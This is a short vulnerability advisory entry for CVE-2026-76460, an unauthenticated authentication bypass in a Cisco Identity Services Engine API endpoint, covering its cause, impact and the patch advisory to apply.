CVE-2026-76460
Overview
This vulnerability is an authentication bypass caused by insufficient authentication controls on a specific API endpoint within Cisco Identity Services Engine (ISE) Software. The root cause lies in the failure to enforce proper authentication checks on the affected API, allowing unauthenticated access. The flaw specifically impacts the web-based management interface component of Cisco ISE, enabling unauthorized interactions with its API endpoints.
Vulnerability Description
A vulnerability in an API of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to bypass authentication. This vulnerability is due to insufficient authentication control on an API endpoint. An attacker could exploit this vulnerability by sending a crafted request to an affected API endpoint. A successful exploit could allow the attacker to gain unauthorized access to the affected device by bypassing the web-based management interface.
Impact
An unauthenticated attacker can remotely bypass authentication controls and gain unauthorized access to the Cisco ISE device management interface. This access enables the attacker to perform administrative actions, potentially leading to full system compromise, including data exposure, configuration changes, or service disruption. No prior authentication or user interaction is required, making the attack feasible from a remote location with network access to the affected API.
Solution
Cisco has released security updates addressing this vulnerability in Cisco Identity Services Engine Software version 3.1.0 and its patches. Administrators should apply the patches provided in the Cisco Security Advisory cisco-sa-ISE-ABP-VNSW7Tn5 available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ISE-ABP-VNSW7Tn5. Following the advisory’s detailed instructions for upgrading to patched versions or applying recommended mitigations is essential to remediate the issue.
